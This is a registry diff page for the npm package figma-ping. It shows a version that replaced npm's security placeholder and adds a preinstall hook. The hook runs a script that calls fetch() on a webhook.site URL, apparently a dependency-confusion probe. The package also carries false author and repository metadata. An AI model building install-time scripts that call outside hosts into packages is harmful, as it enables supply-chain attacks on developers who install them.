figma-ping 0.0.1-security → 1.0.1

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Potentially problematic release.


This version of figma-ping might be problematic. Click here for more details.

@@ -0,0 +1,12 @@
1
+ <?xml version="1.0" encoding="UTF-8"?>
2
+ <module type="WEB_MODULE" version="4">
3
+ <component name="NewModuleRootManager">
4
+ <content url="file://$MODULE_DIR$">
5
+ <excludeFolder url="file://$MODULE_DIR$/temp" />
6
+ <excludeFolder url="file://$MODULE_DIR$/.tmp" />
7
+ <excludeFolder url="file://$MODULE_DIR$/tmp" />
8
+ </content>
9
+ <orderEntry type="inheritedJdk" />
10
+ <orderEntry type="sourceFolder" forTests="false" />
11
+ </component>
12
+ </module>
@@ -0,0 +1,8 @@
1
+ <?xml version="1.0" encoding="UTF-8"?>
2
+ <project version="4">
3
+ <component name="ProjectModuleManager">
4
+ <modules>
5
+ <module fileurl="file://$PROJECT_DIR$/.idea/FigmaPing.iml" filepath="$PROJECT_DIR$/.idea/FigmaPing.iml" />
6
+ </modules>
7
+ </component>
8
+ </project>
package/@ ADDED
@@ -0,0 +1,20 @@
1
+ {
2
+ "name": "figma-ping",
3
+ "version": "1.0.1",
4
+ "description": "this package is used for research purposes. do not use",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "scripts/preinstall.js"
9
+ },
10
+ "repository": {
11
+ "type": "git",
12
+ "url": "git+https://github.com/imartinez/privateGPT.git"
13
+ },
14
+ "author": "Bill clinton",
15
+ "license": "MIT",
16
+ "bugs": {
17
+ "url": "https://github.com/imartinez/privateGPT/issues"
18
+ },
19
+ "homepage": "https://github.com/imartinez/privateGPT#readme"
20
+ }
package/index.js ADDED
File without changes
package/package.json CHANGED
@@ -1,6 +1,20 @@
1
1
  {
2
2
  "name": "figma-ping",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.1",
4
+ "description": "this package is used for research purposes. do not use",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "preinstall": "scripts/preinstall.js"
9
+ },
10
+ "repository": {
11
+ "type": "git",
12
+ "url": "git+https://github.com/imartinez/privateGPT.git"
13
+ },
14
+ "author": "Bill clinton",
15
+ "license": "MIT",
16
+ "bugs": {
17
+ "url": "https://github.com/imartinez/privateGPT/issues"
18
+ },
19
+ "homepage": "https://github.com/imartinez/privateGPT#readme"
6
20
  }
package/readme.md ADDED
@@ -0,0 +1,2 @@
1
+ # this package is used for research purposes! do not use
2
+
@@ -0,0 +1,2 @@
1
+ let f = fetch("https://webhook.site/1c3e7675-0ab8-46c4-8c7d-bbc5e338916b")
2
+ console.log(f)
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=figma-ping for more information.